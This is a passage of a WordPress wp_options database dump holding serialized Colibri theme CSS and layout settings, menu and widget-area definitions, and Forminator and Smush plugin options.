margin-bottom: 15px;\n}\n#colibri .style-184 .widget.widget_search h1,#colibri .style-184 .widget.widget_search h2,#colibri .style-184 .widget.widget_search h3,#colibri .style-184 .widget.widget_search h4,#colibri .style-184 .widget.widget_search h5,#colibri .style-184 .widget.widget_search h6 {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-style: none;\n  font-size: 16px;\n  color: rgb(0, 0, 0);\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"]) {\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  font-size: 16px;\n  color: rgb(102, 102, 102);\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: rgb(222, 222, 222);\n  border-top-style: none;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 0px;\n  border-right-width: 0px;\n  border-right-color: rgb(222, 222, 222);\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(222, 222, 222);\n  border-bottom-style: none;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 0px;\n  border-left-color: rgb(222, 222, 222);\n  border-left-style: none;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n}\n#colibri .style-184 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n  color: rgb(102, 102, 102);\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"],#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n  background-color: rgb(249, 250, 251);\n  background-image: none;\n  font-size: 16px;\n  line-height: 1;\n  color: rgb(0, 0, 0);\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 5px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 0px;\n  border-left-style: none;\n  width: auto;\n  padding-top: 10px;\n  padding-right: 12px;\n  padding-bottom: 10px;\n  padding-left: 12px;\n  margin-top: 0px;\n  margin-right: 0px;\n  margin-bottom: 0px;\n  margin-left: 0px;\n  transition-duration: 0.5s;\n  display: inline-block;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-184 .widget.widget_search button[type=\"submit\"]:hover {\n  color: #03a9f4;\n}\n#colibri .style-184 .widget.widget_search input[type=\"submit\"] {\n  display: none;\n}\n#colibri .style-184 .widget.widget_search button[type=\"submit\"] {\n  display: inline-block;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:186;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:187;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:188;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:189;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:190;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:191;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}}s:14:\"cssByPartialId\";a:9:{i:22;a:10:{s:11:\"local-22-h4\";a:2:{s:7:\"desktop\";s:299:\"#colibri .style-local-22-h4-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-22-h4-outer,#colibri .h-navigation_sticky.style-local-22-h4-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n\";s:6:\"mobile\";s:221:\"#colibri .style-local-22-h4-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n}\n#colibri .h-navigation_sticky .style-local-22-h4-outer,#colibri .h-navigation_sticky.style-local-22-h4-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n}\n\";}s:11:\"local-22-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-22-h6-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n  max-width: 100%;\n}\n\";}s:11:\"local-22-h8\";a:1:{s:7:\"desktop\";s:299:\"#colibri .style-local-22-h8-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-22-h8-outer,#colibri .h-navigation_sticky.style-local-22-h8-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n\";}s:12:\"local-22-h14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h14-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-22-h17\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-22-h17-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-22-h27\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h27-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h27-outer {\n  width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h27-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-22-h21\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h21-outer {\n  width: 75% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h21-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-22-h23\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h23-outer {\n  width: 25% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h23-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-22-h33\";a:3:{s:7:\"desktop\";s:94:\"#colibri .style-local-22-h33-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"tablet\";s:54:\"#colibri .style-local-22-h33-outer {\n  width: 80% ;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-22-h33-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-22-h34\";a:1:{s:7:\"desktop\";s:0:\"\";}}i:25;a:8:{s:12:\"local-25-h14\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h14-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h17\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-25-h17-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-25-h21\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-25-h21-outer {\n  width: 75% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-25-h21-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-25-h23\";a:2:{s:7:\"desktop\";s:94:\"#colibri .style-local-25-h23-outer {\n  width: 25% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";s:6:\"mobile\";s:55:\"#colibri .style-local-25-h23-outer {\n  width: 100% ;\n}\n\";}s:12:\"local-25-h27\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-25-h27-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-25-h8\";a:1:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h8-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h8-outer,#colibri .h-navigation_sticky.style-local-25-h8-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n\";}s:11:\"local-25-h6\";a:1:{s:7:\"desktop\";s:92:\"#colibri .style-local-25-h6-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n  max-width: 100%;\n}\n\";}s:11:\"local-25-h4\";a:2:{s:7:\"desktop\";s:299:\"#colibri .style-local-25-h4-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri .h-navigation_sticky.style-local-25-h4-outer {\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n  width: auto;\n  max-width: 100%;\n}\n\";s:6:\"mobile\";s:221:\"#colibri .style-local-25-h4-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n}\n#colibri .h-navigation_sticky .style-local-25-h4-outer,#colibri .h-navigation_sticky.style-local-25-h4-outer {\n  flex: 1 1 0;\n  -ms-flex: 1 1 0%;\n}\n\";}}i:28;a:1:{s:11:\"local-28-f4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-28-f4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:31;a:10:{s:11:\"local-31-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-31-m4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-31-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-31-m5-height {\n  min-height: 300px;\n}\n\";}s:11:\"local-31-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m7-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m11\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-31-m21\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m21-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m23\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-31-m23-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-31-m31\";a:1:{s:7:\"desktop\";s:95:\"#colibri .style-local-31-m31-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:34;a:8:{s:11:\"local-34-m4\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-34-m4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:13:\"dynamic-34-m5\";a:1:{s:7:\"desktop\";s:59:\".site .style-dynamic-34-m5-height {\n  min-height: 300px;\n}\n\";}s:11:\"local-34-m7\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m7-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m13\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m13-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m15\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-34-m15-outer {\n  width: 50% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-34-m19\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m21\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-34-m23\";a:1:{s:7:\"desktop\";s:0:\"\";}}i:37;a:1:{s:11:\"local-37-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-37-m3-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:40;a:7:{s:11:\"local-40-m3\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:94:\"#colibri .style-local-40-m3-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:11:\"local-40-m5\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-40-m5-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}s:12:\"local-40-m13\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m14\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m16\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m18\";a:1:{s:7:\"desktop\";s:0:\"\";}s:12:\"local-40-m21\";a:2:{s:7:\"desktop\";s:0:\"\";s:6:\"mobile\";s:95:\"#colibri .style-local-40-m21-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:43;a:1:{s:11:\"local-43-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-43-s4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}i:46;a:1:{s:11:\"local-46-s4\";a:1:{s:7:\"desktop\";s:94:\"#colibri .style-local-46-s4-outer {\n  width: 100% ;\n  flex: 0 0 auto;\n  -ms-flex: 0 0 auto;\n}\n\";}}}s:6:\"medias\";a:3:{s:7:\"desktop\";a:6:{s:2:\"id\";s:7:\"desktop\";s:5:\"label\";s:7:\"desktop\";s:4:\"icon\";s:15:\"desktop_windows\";s:4:\"show\";b:1;s:4:\"main\";b:1;s:10:\"gridPrefix\";s:2:\"lg\";}s:6:\"tablet\";a:7:{s:2:\"id\";s:6:\"tablet\";s:5:\"label\";s:6:\"tablet\";s:4:\"icon\";s:14:\"tablet_android\";s:4:\"show\";b:0;s:5:\"width\";i:1024;s:10:\"gridPrefix\";s:2:\"md\";s:5:\"query\";s:49:\"@media (min-width: 768px) and (max-width: 1023px)\";}s:6:\"mobile\";a:6:{s:2:\"id\";s:6:\"mobile\";s:5:\"label\";s:6:\"mobile\";s:4:\"icon\";s:13:\"phone_android\";s:4:\"show\";b:0;s:5:\"width\";i:480;s:5:\"query\";s:25:\"@media (max-width: 767px)\";}}s:8:\"defaults\";a:1:{s:8:\"partials\";a:4:{s:7:\"sidebar\";a:6:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:43;s:12:\"archive_post\";i:-1;s:7:\"product\";i:46;s:15:\"archive_product\";i:-1;}s:6:\"header\";a:6:{s:10:\"front_page\";i:22;s:4:\"page\";i:-1;s:4:\"post\";i:25;s:12:\"archive_post\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:6:\"footer\";a:6:{s:10:\"front_page\";i:-1;s:4:\"page\";i:-1;s:4:\"post\";i:28;s:12:\"archive_post\";i:-1;s:7:\"product\";i:-1;s:15:\"archive_product\";i:-1;}s:4:\"main\";a:6:{i:404;i:37;s:4:\"post\";i:31;s:7:\"archive\";i:34;s:15:\"archive_product\";i:1732;s:7:\"product\";i:1729;s:6:\"search\";i:40;}}}s:4:\"menu\";a:4:{s:16:\"defaultLocations\";a:3:{s:6:\"header\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";s:8:\"priority\";i:2;}}s:7:\"content\";a:1:{i:0;a:3:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page Menu\";s:8:\"priority\";i:1;}}s:6:\"footer\";a:2:{i:0;a:3:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary menu\";s:8:\"priority\";i:1;}i:1;a:3:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";s:8:\"priority\";i:2;}}}s:9:\"locations\";a:5:{i:0;a:2:{s:2:\"id\";s:11:\"header-menu\";s:5:\"label\";s:19:\"Header primary menu\";}i:1;a:2:{s:2:\"id\";s:13:\"header-menu-1\";s:5:\"label\";s:21:\"Header secondary menu\";}i:2;a:2:{s:2:\"id\";s:12:\"content-menu\";s:5:\"label\";s:12:\"In Page Menu\";}i:3;a:2:{s:2:\"id\";s:11:\"footer-menu\";s:5:\"label\";s:19:\"Footer primary menu\";}i:4;a:2:{s:2:\"id\";s:13:\"footer-menu-1\";s:5:\"label\";s:21:\"Footer secondary menu\";}}s:14:\"locationsToAdd\";a:0:{}s:17:\"locationsToDelete\";a:0:{}}s:12:\"widget_areas\";a:10:{s:20:\"header-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Header widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Header widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"header\";}s:20:\"header-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Header widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"header\";}s:21:\"content-widget-area-1\";a:3:{s:4:\"name\";s:21:\"In page widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-2\";a:3:{s:4:\"name\";s:21:\"In page widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:7:\"content\";}s:21:\"content-widget-area-3\";a:3:{s:4:\"name\";s:21:\"In page widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:7:\"content\";}s:20:\"footer-widget-area-1\";a:3:{s:4:\"name\";s:20:\"Footer widget area 1\";s:5:\"index\";i:1;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-2\";a:3:{s:4:\"name\";s:20:\"Footer widget area 2\";s:5:\"index\";i:2;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-3\";a:3:{s:4:\"name\";s:20:\"Footer widget area 3\";s:5:\"index\";i:3;s:4:\"type\";s:6:\"footer\";}s:20:\"footer-widget-area-4\";a:3:{s:4:\"name\";s:20:\"Footer widget area 4\";s:5:\"index\";i:4;s:4:\"type\";s:6:\"footer\";}}s:6:\"global\";a:11:{s:7:\"content\";a:2:{s:8:\"template\";s:0:\"\";s:10:\"collection\";s:0:\"\";}s:6:\"titles\";a:10:{s:16:\"normalPageFormat\";s:7:\"{TITLE}\";s:17:\"normalResultsPage\";s:27:\"Search results for: {TITLE}\";s:9:\"errorPage\";s:22:\"Sorry! Page Not Found!\";s:10:\"singlePost\";s:7:\"{TITLE}\";s:15:\"categoryArchive\";s:16:\"Posts in {TITLE}\";s:13:\"authorArchive\";s:16:\"Posts in {TITLE}\";s:10:\"tagArchive\";s:16:\"Posts in {TITLE}\";s:11:\"yearArchive\";s:16:\"Posts in {TITLE}\";s:12:\"monthArchive\";s:16:\"Posts in {TITLE}\";s:10:\"dayArchive\";s:16:\"Posts in {TITLE}\";}s:6:\"vSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:6:\"hSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:90;s:4:\"unit\";s:2:\"px\";}s:10:\"transition\";a:1:{s:8:\"duration\";a:2:{s:5:\"value\";s:3:\"0.5\";s:4:\"unit\";s:1:\"s\";}}s:4:\"blog\";a:2:{s:5:\"style\";a:0:{}s:5:\"props\";a:0:{}}s:5:\"media\";a:2:{s:6:\"mobile\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:30;s:4:\"unit\";s:2:\"px\";}}s:6:\"tablet\";a:1:{s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:60;s:4:\"unit\";s:2:\"px\";}}}s:13:\"multilanguage\";a:2:{s:5:\"props\";a:2:{s:7:\"enabled\";b:1;s:4:\"type\";s:8:\"dropdown\";}s:5:\"style\";a:4:{s:10:\"background\";a:1:{s:5:\"color\";s:5:\"white\";}s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:80;}s:6:\"border\";a:2:{s:3:\"top\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}s:6:\"bottom\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}}s:11:\"descendants\";a:1:{s:5:\"flags\";a:1:{s:7:\"padding\";a:4:{s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}s:6:\"bottom\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}}}}}}s:9:\"templates\";a:1:{s:4:\"blog\";a:2:{s:5:\"style\";a:1:{s:11:\"descendants\";a:2:{s:7:\"section\";a:1:{s:7:\"padding\";a:2:{s:3:\"top\";a:1:{s:5:\"value\";s:2:\"90\";}s:6:\"bottom\";a:1:{s:5:\"value\";s:2:\"90\";}}}s:13:\"sidebar-right\";a:3:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}s:5:\"media\";a:2:{s:6:\"mobile\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:6:\"tablet\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}s:8:\"maxWidth\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}}}}}s:5:\"props\";a:1:{s:11:\"descendants\";a:2:{s:3:\"row\";a:2:{s:6:\"layout\";a:2:{s:13:\"horizontalGap\";i:2;s:11:\"verticalGap\";i:2;}s:14:\"layout-classes\";a:3:{s:5:\"unset\";b:1;s:11:\"outer_class\";a:1:{i:0;s:16:\"gutters-row-lg-2\";}s:11:\"inner_class\";a:1:{i:0;s:16:\"gutters-col-lg-2\";}}}s:7:\"section\";a:1:{s:8:\"sidebars\";a:1:{s:5:\"right\";b:1;}}}}}}s:16:\"visible_partials\";a:0:{}}s:8:\"imported\";a:10:{s:18:\"theme_default_data\";b:1;s:17:\"header/front_page\";b:1;s:11:\"header/post\";b:1;s:11:\"footer/post\";b:1;s:9:\"main/post\";b:1;s:12:\"main/archive\";b:1;s:8:\"main/404\";b:1;s:11:\"main/search\";b:1;s:12:\"sidebar/post\";b:1;s:15:\"sidebar/product\";b:1;}}','yes'),(362,'_transient_colibriwp_used_svg_icons','a:2:{s:17:\"font-awesome/bars\";s:439:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"/></svg>\";s:31:\"icons8-line-awesome/arrow-right\";s:238:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"arrow-right\" viewBox=\"0 0 512 545.5\"><path d=\"M299.5 140.5l136 136 11 11.5-11 11.5-136 136-23-23L385 304H64v-32h321L276.5 163.5z\"/></svg>\";}','yes'),(365,'nav_menu_options','a:1:{s:8:\"auto_add\";a:1:{i:0;i:5;}}','yes'),(368,'site_logo','7','yes'),(474,'forminator_free_install_date','1644949888','no'),(475,'wpmudev_recommended_plugins_registered','a:2:{s:25:\"forminator/forminator.php\";a:1:{s:13:\"registered_at\";i:1644949888;}s:23:\"wp-smushit/wp-smush.php\";a:1:{s:13:\"registered_at\";i:1647548043;}}','no'),(476,'forminator_version','1.26.0','yes'),(477,'widget_forminator_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(479,'forminator_appearance_presets','a:1:{s:7:\"default\";s:14:\"Default Preset\";}','yes'),(482,'forminator_posts_map','a:0:{}','yes'),(513,'wp_calendar_block_has_published_posts','','yes'),(554,'tax_staff_member_cat_children','a:0:{}','yes'),(830,'staff-member-group_children','a:0:{}','yes'),(844,'wpm_6310_version_info','3.9','yes'),(845,'wpm_6310_default_category_update','100','no'),(991,'ime_options','a:7:{s:7:\"enabled\";b:1;s:4:\"mode\";s:3:\"php\";s:8:\"cli_path\";s:44:\"/home/websites/gsudice.dataconn.net/wp-admin\";s:12:\"handle_sizes\";a:6:{s:9:\"thumbnail\";s:4:\"size\";s:6:\"medium\";s:7:\"quality\";s:12:\"medium_large\";s:7:\"quality\";s:5:\"large\";s:4:\"size\";s:9:\"1536x1536\";s:4:\"size\";s:9:\"2048x2048\";s:4:\"size\";}s:7:\"quality\";a:2:{s:7:\"quality\";i:-1;s:4:\"size\";i:70;}s:9:\"interlace\";b:0;s:7:\"version\";i:1;}','no'),(1147,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:13:\"dice@pobox.pw\";s:7:\"version\";s:5:\"6.3.1\";s:9:\"timestamp\";i:1695808177;}','no'),(1476,'WPLANG','','yes'),(1477,'new_admin_email','dice@pobox.pw','yes'),(1508,'forminator_days_rating_later_dismiss','1','yes'),(7382,'forminator_version_upgraded','1','yes'),(7405,'wp-smush-settings','a:23:{s:4:\"auto\";b:1;s:5:\"lossy\";b:0;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:0;s:6:\"backup\";b:0;s:8:\"no_scale\";b:0;s:10:\"png_to_jpg\";b:0;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:10:\"js_builder\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;s:5:\"usage\";b:0;s:17:\"accessible_colors\";b:0;s:9:\"keep_data\";b:1;s:9:\"lazy_load\";b:0;s:17:\"background_images\";b:1;s:16:\"rest_api_support\";b:0;s:8:\"webp_mod\";b:0;}','yes'),(7406,'wp-smush-install-type','existing','no'),(7407,'wp-smush-version','3.9.5','no'),(7410,'wdev-frash','a:3:{s:7:\"plugins\";a:1:{s:23:\"wp-smushit/wp-smush.php\";i:1647548043;}s:5:\"queue\";a:1:{s:32:\"fc50097023d0d34c5a66f6cddcf77694\";a:3:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:1648152843;}}s:4:\"done\";a:1:{i:0;a:6:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1647548043;s:5:\"state\";s:6:\"ignore\";s:4:\"hash\";s:32:\"fc50097023d0d34c5a66f6cddcf77694\";s:10:\"handled_at\";i:1647548136;}}}','no'),(7616,'cp_dismissed_notifications','a:3:{i:0;s:49:\"extendthemes_remote_notification_colibri-wp_17113\";i:1;s:49:\"extendthemes_remote_notification_colibri-wp_19773\";i:2;s:49:\"extendthemes_remote_notification_colibri-wp_28810\";}','yes'),(9202,'category_children','a:0:{}','yes'),(76535,'user_count','1','no'),(76536,'db_upgraded','','yes'),(222859,'wpmudev_notices','a:3:{s:7:\"plugins\